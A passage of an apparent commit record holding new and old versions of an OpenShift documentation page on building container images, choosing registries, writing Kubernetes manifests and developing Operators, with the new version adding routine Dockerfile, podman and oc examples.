Tag and push to a registry: Add a tag to your new container image that\nidentifies the location of the registry in which you want to store and share\nyour container. Then push that image to the registry by running the\n`podman push`\u00a0or `docker push` command.\n. Pull and run the image: From any system that has a container client tool,\nsuch as podman\u00a0or docker, run a command that identifies your new image.\nFor example, run the `podman run\u00a0<image_name>` or `docker run <image_name>`\ncommand. Here `<image_name>` is the name of your new container image, which\nresembles `quay.io\/myrepo\/myapp:latest`. The registry might require credentials\nto push and pull images.\n\nifdef::openshift-origin,openshift-enterprise,openshift-webscale[]\nFor more details on the process of building container images, pushing them to\nregistries, and running them, see\nxref:..\/cicd\/builds\/custom-builds-buildah.adoc#custom-builds-buildah[Custom image builds with Buildah].\nendif::openshift-origin,openshift-enterprise,openshift-webscale[]\n\n[id=\"container-build-tool-options\"]\n=== Container build tool options\n\nWhile the Docker Container Engine and `docker`\u00a0command are popular tools\nto work with containers, with {op-system-base} and many other Linux systems, you can\ninstead choose a different set of container tools that includes podman, skopeo,\nand buildah. You can still use Docker Container Engine tools to create\ncontainers that will run in {product-title} and any other container platform.\n\nBuilding and managing containers with buildah, podman, and skopeo\u00a0results in\nindustry standard container images that include features tuned specifically\nfor ultimately deploying those containers in {product-title} or other Kubernetes\nenvironments. These tools are daemonless and can be run without root privileges,\nso there is less overhead in running them.\n\nWhen you ultimately run your containers in {product-title}, you use the\nlink:https:\/\/cri-o.io\/[CRI-O]\u00a0container engine. CRI-O runs on every worker and\nmaster machine in an {product-title} cluster, but CRI-O is not yet supported as\na standalone runtime outside of {product-title}.\n\n[id=\"base-image-options\"]\n=== Base image options\n\nThe base image you choose to build your application on contains a set of\nsoftware that resembles a Linux system to your application. When you build your\nown image, your software is placed into that file system and sees that file\nsystem as though it were looking at its operating system. Choosing this base\nimage has major impact on how secure, efficient and upgradeable\u00a0your container\nis in the future.\n\nRed Hat provides a new set of base images referred to as\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux_atomic_host\/7\/html-single\/getting_started_with_containers\/index#using_red_hat_base_container_images_standard_and_minimal[Red Hat Universal Base Images]\u00a0(UBI).\nThese images are based on Red Hat Enterprise Linux and are similar to base\nimages that Red Hat has offered in the past, with one major difference: they\nare freely redistributable without a Red Hat subscription. As a result, you can\nbuild your application on UBI images without having to worry about how they\nare shared or the need to create different images for different environments.\n\nThese UBI images have standard, init, and minimal versions. 
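As a rough sketch of how a UBI base slots into the Dockerfile step described earlier, the following builds a trivial image on the `ubi8\/ubi-minimal` base; the application script is a hypothetical placeholder, and the `quay.io\/myrepo\/myapp` tag reuses the example image name above.\n\n[source,bash]\n----\n# Write a minimal Dockerfile on a freely redistributable UBI base\ncat > Dockerfile <<'EOF'\nFROM registry.access.redhat.com\/ubi8\/ubi-minimal\n# ubi-minimal ships microdnf instead of yum\/dnf\nRUN microdnf install -y python3 && microdnf clean all\nCOPY app.py \/opt\/app\/app.py\nCMD [\"python3\", \"\/opt\/app\/app.py\"]\nEOF\n\n# Build it with buildah (bud = build-using-dockerfile) and tag it for a registry\nbuildah bud -t quay.io\/myrepo\/myapp:latest .\n----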
You can also use the\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_software_collections\/3\/html-single\/using_red_hat_software_collections_container_images\/index[Red Hat Software Collections]\nimages as a foundation for applications that rely on specific runtime\nenvironments such as Node.js, Perl, or Python. Special versions of some of\nthese runtime base images are referred to as Source-to-Image (S2I) images. With\nS2I images, you can insert your code into a base image environment that is ready\nto run that code.\n\nS2I images are available for you to use directly from the {product-title} web UI\nby selecting *Catalog* -> *Developer Catalog*, as shown in the following figure:\n\n.Choose S2I base images for apps that need specific runtimes\nimage::developer-catalog.png[{product-title} Developer Catalog]\n\n[id=\"understanding-development-registry-options\"]\n=== Registry options\n\nContainer registries are where you store container images so you can share them\nwith others and make them available to the platform where they ultimately run.\nYou can select large, public container registries that offer free accounts or a\npremium version that offer more storage and special features. You can also\ninstall your own registry that can be exclusive to your organization or\nselectively shared with others.\n\nTo get Red Hat images and certified partner images, you can draw from the\nRed Hat Registry. The Red Hat Registry is represented by two locations:\n`registry.access.redhat.com`, which is unauthenticated and deprecated, and\n`registry.redhat.io`, which requires authentication. You can learn about the Red\nHat and partner images in the Red Hat Registry from the\nlink:https:\/\/catalog.redhat.com\/software\/containers\/explore[Container images section of the Red Hat Ecosystem Catalog].\nBesides listing Red Hat container images, it also shows extensive information\nabout the contents and quality of those images, including health scores that are\nbased on applied security updates.\n\nLarge, public registries include link:https:\/\/hub.docker.com\/[Docker Hub]\u00a0and\nlink:https:\/\/quay.io\/[Quay.io]. The Quay.io registry is owned and managed by Red\nHat. Many of the components used in {product-title} are stored in Quay.io,\nincluding container images and the Operators that are used to deploy\n{product-title} itself. Quay.io also offers the means of storing other types of\ncontent, including Helm charts.\n\nIf you want your own, private container registry, {product-title} itself\nincludes a private container registry that is installed with {product-title}\nand runs on its cluster. Red Hat also offers a private version of the Quay.io\nregistry called link:https:\/\/access.redhat.com\/products\/red-hat-quay[Red Hat Quay].\nRed Hat Quay includes geo replication, Git build triggers, Clair image scanning,\nand many other features.\n\nAll of the registries mentioned here can require credentials to download images\nfrom those registries. Some of those credentials are presented on a cluster-wide\nbasis from {product-title}, while other credentials can be assigned to individuals.\n\n[id=\"creating-kubernetes-manifest-openshift\"]\n== Creating a Kubernetes manifest for {product-title}\n\nWhile the container image is the basic building block for a containerized\napplication, more information is required to manage and deploy that application\nin a Kubernetes environment such as {product-title}. 
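For example, with the podman tools mentioned earlier, pulling from the authenticated location requires a login first, while the deprecated unauthenticated location does not; a minimal sketch:\n\n[source,bash]\n----\n# registry.redhat.io requires authentication before images can be pulled\npodman login registry.redhat.io\npodman pull registry.redhat.io\/ubi8\/ubi\n\n# registry.access.redhat.com is unauthenticated (and deprecated)\npodman pull registry.access.redhat.com\/ubi8\/ubi\n----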
The typical next steps after\nyou create an image are to:\n\n* Understand the different resources you work with in Kubernetes manifests\n* Make some decisions about what kind of an application you are running\n* Gather supporting components\n* Create a manifest and store that manifest in a Git repository so you can store\nit in a source versioning system, audit it, track it, promote and deploy it\nto the next environment, roll it back to earlier versions, if necessary, and\nshare it with others\n\n[id=\"understanding-kubernetes-pods\"]\n=== About Kubernetes pods and services\n\nWhile the container image is the basic unit with docker, the basic units that\nKubernetes works with are called\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/pods\/pod-overview\/[pods].\nPods represent the next step in building out an application. A pod can contain\none or more than one container. The key is that the pod is the single unit\nthat you deploy, scale, and manage.\n\nScalability and namespaces are probably the main items to consider when determining\nwhat goes in a pod. For ease of deployment, you might want to deploy a container\nin a pod and include its own logging and monitoring container in the pod. Later,\nwhen you run the pod and need to scale up an additional instance, those other\ncontainers are scaled up with it. For namespaces, containers in a pod share the\nsame network interfaces, shared storage volumes, and resource limitations,\nsuch as memory and CPU, which makes it easier to manage the contents of the pod\nas a single unit. Containers in a pod can also communicate with each other by\nusing standard inter-process communications, such as System V semaphores or\nPOSIX shared memory.\n\nWhile individual pods represent a scalable unit in Kubernetes, a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/[service]\nprovides a means of grouping together a set of pods to create a complete, stable\napplication that can complete tasks such as load balancing.\u00a0A service is also\nmore permanent than a pod because the service remains available from the same\nIP address until you delete it. When the service is in use, it is requested by\nname and the {product-title} cluster resolves that name into the IP addresses\nand ports where you can reach the pods that compose the service.\n\nBy their nature, containerized applications are separated\u00a0from the operating\nsystems where they run and, by extension, their users. Part of your Kubernetes\nmanifest describes how to expose the application to internal and external\nnetworks by defining\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/network-policies\/[network policies]\nthat allow fine-grained control over communication with your containerized\napplications. To connect incoming requests for HTTP, HTTPS, and other services\nfrom outside your cluster to services inside your cluster, you can use an\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/ingress\/[`Ingress`]\nresource.\n\nIf your container requires on-disk storage instead of database storage, which\nmight be provided through a service, you can add\nlink:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/[volumes]\nto your manifests\u00a0to make that storage available to your pods. 
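As an illustration only, a pod can ask for that storage through a persistent volume claim; the names here are hypothetical, and the claim assumes the cluster has a default storage class that can provision the volume dynamically.\n\n[source,bash]\n----\n# A claim for 1Gi of storage plus a pod that mounts it (hypothetical names)\ncat <<'EOF' | oc apply -f -\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n  name: myapp-data\nspec:\n  accessModes:\n  - ReadWriteOnce\n  resources:\n    requests:\n      storage: 1Gi\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: myapp\nspec:\n  containers:\n  - name: myapp\n    image: quay.io\/myrepo\/myapp:latest\n    volumeMounts:\n    - mountPath: \/opt\/app\/data\n      name: data\n  volumes:\n  - name: data\n    persistentVolumeClaim:\n      claimName: myapp-data\nEOF\n----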
You can configure\nthe manifests to create persistent volumes (PVs) or dynamically create volumes that\nare added to your `Pod` definitions.\n\nAfter you define a group of pods that compose your application, you can define\nthose pods in\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/deployment\/[`Deployment`]\nand xref:..\/applications\/deployments\/what-deployments-are.adoc#what-deployments-are[`DeploymentConfig`] objects.\n\n[id=\"application-types\"]\n=== Application types\n\nNext, consider how your application type influences how to run it.\n\nKubernetes defines different types of workloads that are appropriate for\ndifferent kinds of applications. To determine the appropriate workload for your\napplication, consider if the application is:\n\n* Meant to run to completion and be done.\u00a0An example is an application that\nstarts up to produce a report and exits when the report is complete. The\napplication might not run again then for a month. Suitable {product-title}\nobjects for these types of applications include\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/jobs-run-to-completion\/[`Job`]\nand https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/cron-jobs\/[`CronJob`]\u00a0objects.\n* Expected to run continuously.\u00a0For long-running applications, you can write a\nxref:..\/applications\/deployments\/what-deployments-are.adoc#deployments-kube-deployments[deployment].\n* Required to be highly available.\u00a0If your application requires high\navailability, then you want to size your deployment to have more than one\ninstance. A `Deployment` or `DeploymentConfig` object can incorporate a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/replicaset\/[replica set]\nfor that type of application. With replica sets, pods run across multiple nodes\nto make sure the application is always available, even if a worker goes down.\n* Need to run on every node.\u00a0Some types of Kubernetes applications are intended\nto run in the cluster itself on every master or worker node. DNS and monitoring\napplications are examples of applications that need to run continuously on every\nnode. You can run this type of application as a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/daemonset\/[daemon set].\nYou can also run a daemon set on a subset of nodes, based on node labels.\n* Require life-cycle management.\u00a0When you want to hand off your application so\nthat others can use it, consider creating an\nlink:https:\/\/coreos.com\/operators\/[Operator]. Operators let you build in\nintelligence, so it can handle things like backups and upgrades automatically.\nCoupled with the Operator Lifecycle Manager (OLM), cluster managers can expose\nOperators to selected namespaces so that users in the cluster can run them.\n* Have identity or numbering requirements. An application might have identity\nrequirements or numbering requirements.\u00a0For example, you might be\nrequired to run exactly three instances of the application and to name the\ninstances `0`, `1`, and `2`. A\nhttps:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/statefulset\/[stateful set]\nis suitable for this application.\u00a0Stateful sets are most useful for applications\nthat require independent storage, such as databases and zookeeper clusters.\n\n[id=\"supporting-components\"]\n=== Available supporting components\n\nThe application you write might need supporting components, like a database or\na logging component. 
To fulfill that need, you might be able to obtain the\nrequired component from the following Catalogs that are available in the\n{product-title} web console:\n\n* OperatorHub, which is available in each {product-title} {product-version}\ncluster. The OperatorHub makes Operators available from Red Hat,\ncertified Red Hat partners, and community members to the cluster operator. The\ncluster operator can make those Operators available in all or selected\nnamespaces in the cluster, so developers can launch them and configure them\nwith their applications.\n* Templates, which are useful for a one-off type of application, where the\nlifecycle of a component is not important after it is installed. A template provides an easy\nway to get started developing a Kubernetes application with minimal overhead.\nA template can be a list of resource definitions, which could be `Deployment`,\n`Service`, `Route`,\u00a0or other objects. If you want to change names or resources,\nyou can set these values as parameters in the template.\n\nYou can configure the supporting Operators and\ntemplates to the specific needs of your development team and then make them\navailable in the namespaces in which your developers work.\u00a0Many people add\nshared templates to the `openshift` namespace because it is accessible from all\nother namespaces.\n\n[id=\"applying-manifest\"]\n=== Applying the manifest\n\nKubernetes manifests let you create a more complete picture of the components\nthat make up your Kubernetes applications. You write these manifests as YAML\nfiles and deploy them by applying them to the cluster, for example, by running\nthe `oc apply`\u00a0command.\n\n[id=\"manifest-next-steps\"]\n=== Next steps\n\nAt this point, consider ways to automate your container development process.\nIdeally, you have some sort of CI pipeline\u00a0that builds the images and pushes\nthem to a registry. In particular, a GitOps pipeline integrates your container\ndevelopment with the Git repositories that you use to store the software that\nis required to build your applications.\n\nThe workflow to this point might look like:\n\n* Day 1: You write some YAML. You then run the `oc apply`\u00a0command to apply that\nYAML to the cluster and test that it works.\n* Day 2: You put your YAML container configuration file into your own Git\nrepository. From there, people who want to install that app, or help you improve\nit, can pull down the YAML and apply it to their cluster to run the app.\n* Day 3: Consider writing an Operator for your application.\n\n[id=\"develop-for-operators\"]\n== Develop for Operators\n\nPackaging and deploying your application as an Operator might be preferred\nif you make your application available for others to run. As noted earlier,\nOperators add a lifecycle component to your application that acknowledges that\nthe job of running an application is not complete as soon as it is installed.\n\nWhen you create an application as an Operator, you can build in your own\nknowledge of how to run and maintain the application. You can build in features\nfor upgrading the application, backing it up, scaling it, or keeping track of\nits state. If you configure the application correctly, maintenance tasks,\nlike updating the Operator, can happen automatically and invisibly to the\nOperator's users.\n\nAn example of a useful Operator is one that is set up to automatically back up\ndata at particular times. 
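To make that idea concrete, the schedule such an Operator manages could boil down to something like the following plain `CronJob`, shown only as an illustrative sketch with hypothetical names; a real Operator would create and maintain this resource on the user's behalf, and older clusters may need `batch\/v1beta1` as the apiVersion.\n\n[source,bash]\n----\n# A nightly backup job at 02:00 (names, image, and target are hypothetical)\ncat <<'EOF' | oc apply -f -\napiVersion: batch\/v1\nkind: CronJob\nmetadata:\n  name: myapp-backup\nspec:\n  schedule: \"0 2 * * *\"\n  jobTemplate:\n    spec:\n      template:\n        spec:\n          restartPolicy: OnFailure\n          containers:\n          - name: backup\n            image: quay.io\/myrepo\/myapp-backup:latest\n            args: [\"--target\", \"s3:\/\/my-backup-bucket\"]\nEOF\n----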
Having an Operator manage an application\u2019s backup at\nset times can save a system administrator from remembering to do it.\n\nAny application maintenance that has traditionally been completed manually,\nlike backing up data or rotating certificates, can be completed automatically\nwith an Operator.\n","old_contents":"[id=\"understanding-development\"]\n= Understanding {product-title} development\ninclude::modules\/common-attributes.adoc[]\n:context: understanding-development\ntoc::[]\n\nTo fully leverage the capability of containers when developing and running\nenterprise-quality applications, ensure your environment is supported by tools\nthat allow containers to be:\n\n* Created as discrete microservices that can be connected to other\ncontainerized, and non-containerized, services. For example, you might want to\njoin your application with a database or attach a monitoring application to it.\n\n* Resilient, so if a server crashes or needs to go down for maintenance or to be\ndecommissioned, containers can start on another machine.\n\n* Automated to pick up code changes automatically and then start and deploy new\nversions of themselves.\n\n* Scaled up, or replicated, to have more instances serving clients as demand\nincreases and then spun down to fewer instances as demand declines.\n\n* Run in different ways, depending on the type of application. For example, one\napplication might run once a month to produce a report and then exit. Another\napplication might need to run constantly and be highly available to clients.\n\n* Managed so you can watch the state of your application and react when\nsomething goes wrong.\n\nContainers\u2019 widespread acceptance, and the resulting requirements for tools and\nmethods to make them enterprise-ready, resulted in many options for them.\n\nThe rest of this section explains options for\nassets you can create when you build and deploy containerized Kubernetes\napplications in {product-title}. It also describes which approaches you might\nuse for different kinds of applications and development requirements.\n\n[id=\"developing-containerized-applications\"]\n== About developing containerized applications\n\nYou can approach application development with containers in many ways, and\ndifferent approaches might be more appropriate for different situations. To\nillustrate some of this variety, the series of approaches that is presented\nstarts with developing a single container and ultimately deploys that container\nas a mission-critical application for a large enterprise. These approaches\nshow different tools, formats, and methods that you can employ with containerized\napplication development. This topic describes:\n\n* Building a simple container and storing it in a registry\n* Creating a Kubernetes manifest and saving it to a Git repository\n* Making an Operator to share your application with others\n\n[id=\"building-simple-container\"]\n== Building a simple container\n\nYou have an idea for an application and you want to containerize it.\n\nFirst you require a tool for building a container, like buildah\u00a0or docker,\nand a file that describes what goes in your container, which is typically a\nlink:https:\/\/docs.docker.com\/engine\/reference\/builder\/[Dockerfile].\n\nNext, you require a location to push the resulting container image so you can\npull it to run anywhere you want it to run. 
This location is a container\nregistry.\n\nSome examples of each of these components are installed by default on most\nLinux operating systems, except for the Dockerfile, which you provide yourself.\n\nThe following diagram displays the process of building and pushing an image:\n\n.Create a simple containerized application and push it to a registry\nimage::create-push-app.png[Creating and pushing a containerized application]\n\nIf you use a computer that runs {op-system-base-full} as the operating\nsystem, the process of creating a containerized application requires the\nfollowing steps:\n\n. Install container build tools: {op-system-base} contains a set of tools that includes\npodman, buildah, and skopeo that you use to build and manage containers.\n. Create a Dockerfile to combine base image and software: Information about\nbuilding your container goes into a file that is named `Dockerfile`. In that\nfile, you identify the base image you build from, the software packages you\ninstall, and the software you copy into the container. You also identify\nparameter values like network ports that you expose outside the container and\nvolumes that you mount inside the container. Put your Dockerfile and the\nsoftware you want to containerized in a directory on your {op-system-base} system.\n. Run buildah or docker build: Run the `buildah build-using-dockerfile` or\nthe `docker build`\u00a0command to pull you chosen base image to the local system and\ncreates a container image that is stored locally.\u00a0You can also build container\nwithout a Dockerfile by using buildah.\n. Tag and push to a registry: Add a tag to your new container image that\nidentifies the location of the registry in which you want to store and share\nyour container. Then push that image to the registry by running the\n`podman push`\u00a0or `docker push` command.\n. Pull and run the image: From any system that has a container client tool,\nsuch as podman\u00a0or docker, run a command that identifies your new image.\nFor example, run the `podman run\u00a0<image_name>` or `docker run <image_name>`\ncommand. Here `<image_name>` is the name of your new container image, which\nresembles `quay.io\/myrepo\/myapp:latest`. The registry might require credentials\nto push and pull images.\n\nifdef::openshift-origin,openshift-enterprise,openshift-webscale[]\nFor more details on the process of building container images, pushing them to\nregistries, and running them, see\nxref:..\/cicd\/builds\/custom-builds-buildah.adoc#custom-builds-buildah[Custom image builds with Buildah].\nendif::openshift-origin,openshift-enterprise,openshift-webscale[]\n\n[id=\"container-build-tool-options\"]\n=== Container build tool options\n\nWhile the Docker Container Engine and `docker`\u00a0command are popular tools\nto work with containers, with {op-system-base} and many other Linux systems, you can\ninstead choose a different set of container tools that includes podman, skopeo,\nand buildah. You can still use Docker Container Engine tools to create\ncontainers that will run in {product-title} and any other container platform.\n\nBuilding and managing containers with buildah, podman, and skopeo\u00a0results in\nindustry standard container images that include features tuned specifically\nfor ultimately deploying those containers in {product-title} or other Kubernetes\nenvironments. 
These tools are daemonless and can be run without root privileges,\nso there is less overhead in running them.\n\nWhen you ultimately run your containers in {product-title}, you use the\nlink:https:\/\/cri-o.io\/[CRI-O]\u00a0container engine. CRI-O runs on every worker and\nmaster machine in an {product-title} cluster, but CRI-O is not yet supported as\na standalone runtime outside of {product-title}.\n\n[id=\"base-image-options\"]\n=== Base image options\n\nThe base image you choose to build your application on contains a set of\nsoftware that resembles a Linux system to your application. When you build your\nown image, your software is placed into that file system and sees that file\nsystem as though it were looking at its operating system. Choosing this base\nimage has major impact on how secure, efficient and upgradeable\u00a0your container\nis in the future.\n\nRed Hat provides a new set of base images referred to as\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_enterprise_linux_atomic_host\/7\/html-single\/getting_started_with_containers\/index#using_red_hat_base_container_images_standard_and_minimal[Red Hat Universal Base Images]\u00a0(UBI).\nThese images are based on Red Hat Enterprise Linux and are similar to base\nimages that Red Hat has offered in the past, with one major difference: they\nare freely redistributable without a Red Hat subscription. As a result, you can\nbuild your application on UBI images without having to worry about how they\nare shared or the need to create different images for different environments.\n\nThese UBI images have standard, init, and minimal versions. You can also use the\nlink:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_software_collections\/3\/html-single\/using_red_hat_software_collections_container_images\/index[Red Hat Software Collections]\nimages as a foundation for applications that rely on specific runtime\nenvironments such as Node.js, Perl, or Python. Special versions of some of\nthese runtime base images referred to as Source-to-image (S2I) images. With\nS2I images, you can insert your code into a base image environment that is ready\nto run that code.\n\nS2I images are available for you to use directly from the {product-title} web UI\nby selecting *Catalog* -> *Developer Catalog*, as shown in the following figure:\n\n.Choose S2I base images for apps that need specific runtimes\nimage::developer-catalog.png[{product-title} Developer Catalog]\n\n[id=\"understanding-development-registry-options\"]\n=== Registry options\n\nContainer registries are where you store container images so you can share them\nwith others and make them available to the platform where they ultimately run.\nYou can select large, public container registries that offer free accounts or a\npremium version that offer more storage and special features. You can also\ninstall your own registry that can be exclusive to your organization or\nselectively shared with others.\n\nTo get Red Hat images and certified partner images, you can draw from the\nRed Hat Registry. The Red Hat Registry is represented by two locations:\n`registry.access.redhat.com`, which is unauthenticated and deprecated, and\n`registry.redhat.io`, which requires authentication. 
You can learn about the Red\nHat and partner images in the Red Hat Registry from the\nlink:https:\/\/catalog.redhat.com\/software\/containers\/explore[Container images section of the Red Hat Ecosystem Catalog].\nBesides listing Red Hat container images, it also shows extensive information\nabout the contents and quality of those images, including health scores that are\nbased on applied security updates.\n\nLarge, public registries include link:https:\/\/hub.docker.com\/[Docker Hub]\u00a0and\nlink:https:\/\/quay.io\/[Quay.io]. The Quay.io registry is owned and managed by Red\nHat. Many of the components used in {product-title} are stored in Quay.io,\nincluding container images and the Operators that are used to deploy\n{product-title} itself. Quay.io also offers the means of storing other types of\ncontent, including Helm charts.\n\nIf you want your own, private container registry, {product-title} itself\nincludes a private container registry that is installed with {product-title}\nand runs on its cluster. Red Hat also offers a private version of the Quay.io\nregistry called link:https:\/\/access.redhat.com\/products\/red-hat-quay[Red Hat Quay].\nRed Hat Quay includes geo replication, Git build triggers, Clair image scanning,\nand many other features.\n\nAll of the registries mentioned here can require credentials to download images\nfrom those registries. Some of those credentials are presented on a cluster-wide\nbasis from {product-title}, while other credentials can be assigned to individuals.\n\n[id=\"creating-kubernetes-manifest-openshift\"]\n== Creating a Kubernetes manifest for {product-title}\n\nWhile the container image is the basic building block for a containerized\napplication, more information is required to manage and deploy that application\nin a Kubernetes environment such as {product-title}. The typical next steps after\nyou create an image are to:\n\n* Understand the different resources you work with in Kubernetes manifests\n* Make some decisions about what kind of an application you are running\n* Gather supporting components\n* Create a manifest and store that manifest in a Git repository so you can store\nit in a source versioning system, audit it, track it, promote and deploy it\nto the next environment, roll it back to earlier versions, if necessary, and\nshare it with others\n\n[id=\"understanding-kubernetes-pods\"]\n=== About Kubernetes pods and services\n\nWhile the container image is the basic unit with docker, the basic units that\nKubernetes works with are called\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/pods\/pod-overview\/[pods].\nPods represent the next step in building out an application. A pod can contain\none or more than one container. The key is that the pod is the single unit\nthat you deploy, scale, and manage.\n\nScalability and namespaces are probably the main items to consider when determining\nwhat goes in a pod. For ease of deployment, you might want to deploy a container\nin a pod and include its own logging and monitoring container in the pod. Later,\nwhen you run the pod and need to scale up an additional instance, those other\ncontainers are scaled up with it. For namespaces, containers in a pod share the\nsame network interfaces, shared storage volumes, and resource limitations,\nsuch as memory and CPU, which makes it easier to manage the contents of the pod\nas a single unit. 
Containers in a pod can also communicate with each other by\nusing standard inter-process communications, such as System V semaphores or\nPOSIX shared memory.\n\nWhile individual pods represent a scalable unit in Kubernetes, a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/[service]\nprovides a means of grouping together a set of pods to create a complete, stable\napplication that can complete tasks such as load balancing.\u00a0A service is also\nmore permanent than a pod because the service remains available from the same\nIP address until you delete it. When the service is in use, it is requested by\nname and the {product-title} cluster resolves that name into the IP addresses\nand ports where you can reach the pods that compose the service.\n\nBy their nature, containerized applications are separated\u00a0from the operating\nsystems where they run and, by extension, their users. Part of your Kubernetes\nmanifest describes how to expose the application to internal and external\nnetworks by defining\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/network-policies\/[network policies]\nthat allow fine-grained control over communication with your containerized\napplications. To connect incoming requests for HTTP, HTTPS, and other services\nfrom outside your cluster to services inside your cluster, you can use an\nlink:https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/ingress\/[`Ingress`]\nresource.\n\nIf your container requires on-disk storage instead of database storage, which\nmight be provided through a service, you can add\nlink:https:\/\/kubernetes.io\/docs\/concepts\/storage\/volumes\/[volumes]\nto your manifests\u00a0to make that storage available to your pods. You can configure\nthe manifests to create persistent volumes (PVs) or dynamically create volumes that\nare added to your `Pod` definitions.\n\nAfter you define a group of pods that compose your application, you can define\nthose pods in\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/deployment\/[`Deployment`]\nand xref:..\/applications\/deployments\/what-deployments-are.adoc#what-deployments-are[`DeploymentConfig`] objects.\n\n[id=\"application-types\"]\n=== Application types\n\nNext, consider how your application type influences how to run it.\n\nKubernetes defines different types of workloads that are appropriate for\ndifferent kinds of applications. To determine the appropriate workload for your\napplication, consider if the application is:\n\n* Meant to run to completion and be done.\u00a0An example is an application that\nstarts up to produce a report and exits when the report is complete. The\napplication might not run again then for a month. Suitable {product-title}\nobjects for these types of applications include\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/jobs-run-to-completion\/[`Job`]\nand https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/cron-jobs\/[`CronJob`]\u00a0objects.\n* Expected to run continuously.\u00a0For long-running applications, you can write a\nxref:..\/applications\/deployments\/what-deployments-are.adoc#deployments-kube-deployments[deployment].\n* Required to be highly available.\u00a0If your application requires high\navailability, then you want to size your deployment to have more than one\ninstance. 
A `Deployment` or `DeploymentConfig` object can incorporate a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/replicaset\/[replica set]\nfor that type of application. With replica sets, pods run across multiple nodes\nto make sure the application is always available, even if a worker goes down.\n* Need to run on every node.\u00a0Some types of Kubernetes applications are intended\nto run in the cluster itself on every master or worker node. DNS and monitoring\napplications are examples of applications that need to run continuously on every\nnode. You can run this type of application as a\nlink:https:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/daemonset\/[daemon set].\nYou can also run a daemon set on a subset of nodes, based on node labels.\n* Require life-cycle management.\u00a0When you want to hand off your application so\nthat others can use it, consider creating an\nlink:https:\/\/coreos.com\/operators\/[Operator]. Operators let you build in\nintelligence, so it can handle things like backups and upgrades automatically.\nCoupled with the Operator Lifecycle Manager (OLM), cluster managers can expose\nOperators to selected namespaces so that users in the cluster can run them.\n* Have identity or numbering requirements. An application might have identity\nrequirements or numbering requirements.\u00a0For example, you might be\nrequired to run exactly three instances of the application and to name the\ninstances `0`, `1`, and `2`. A\nhttps:\/\/kubernetes.io\/docs\/concepts\/workloads\/controllers\/statefulset\/[stateful set]\nis suitable for this application.\u00a0Stateful sets are most useful for applications\nthat require independent storage, such as databases and zookeeper clusters.\n\n[id=\"supporting-components\"]\n=== Available supporting components\n\nThe application you write might need supporting components, like a database or\na logging component. To fulfill that need, you might be able to obtain the\nrequired component from the following Catalogs that are available in the\n{product-title} web console:\n\n* OperatorHub, which is available in each {product-title} {product-version}\ncluster. The OperatorHub makes Operators available from Red Hat,\ncertified Red Hat partners, and community members to the cluster operator. The\ncluster operator can make those Operators available in all or selected\nnamespaces in the cluster, so developers can launch them and configure them\nwith their applications.\n* Templates, which are useful for a one-off type of application, where the\nlifecycle of a component is not important after it is installed. A template provides an easy\nway to get started developing a Kubernetes application with minimal overhead.\nA template can be a list of resource definitions, which could be `Deployment`,\n`Service`, `Route`,\u00a0or other objects. If you want to change names or resources,\nyou can set these values as parameters in the template.\n\nYou can configure the supporting Operators and\ntemplates to the specific needs of your development team and then make them\navailable in the namespaces in which your developers work.\u00a0Many people add\nshared templates to the `openshift` namespace because it is accessible from all\nother namespaces.\n\n[id=\"applying-manifest\"]\n=== Applying the manifest\n\nKubernetes manifests let you create a more complete picture of the components\nthat make up your Kubernetes applications. 
You write these manifests as YAML\nfiles and deploy them by applying them to the cluster, for example, by running\nthe `oc apply`\u00a0command.\n\n[id=\"manifest-next-steps\"]\n=== Next steps\n\nAt this point, consider ways to automate your container development process.\nIdeally, you have some sort of CI pipeline\u00a0that builds the images and pushes\nthem to a registry. In particular, a GitOps pipeline integrates your container\ndevelopment with the Git repositories that you use to store the software that\nis required to build your applications.\n\nThe workflow to this point might look like:\n\n* Day 1: You write some YAML. You then run the `oc apply`\u00a0command to apply that\nYAML to the cluster and test that it works.\n* Day 2: You put your YAML container configuration file into your own Git\nrepository. From there, people who want to install that app, or help you improve\nit, can pull down the YAML and apply it to their cluster to run the app.\n* Day 3: Consider writing an Operator for your application.\n\n[id=\"develop-for-operators\"]\n== Develop for Operators\n\nPackaging and deploying your application as an Operator might be preferred\nif you make your application available for others to run. As noted earlier,\nOperators add a lifecycle component to your application that acknowledges that\nthe job of running an application is not complete as soon as it is installed.\n\nWhen you create an application as an Operator, you can build in your own\nknowledge of how to run and maintain the application. You can build in features\nfor upgrading the application, backing it up, scaling it, or keeping track of\nits state. If you configure the application correctly, maintenance tasks,\nlike updating the Operator, can happen automatically and invisibly to the\nOperator's users.\n\nAn example of a useful Operator is one that is set up to automatically back up\ndata at particular times. 
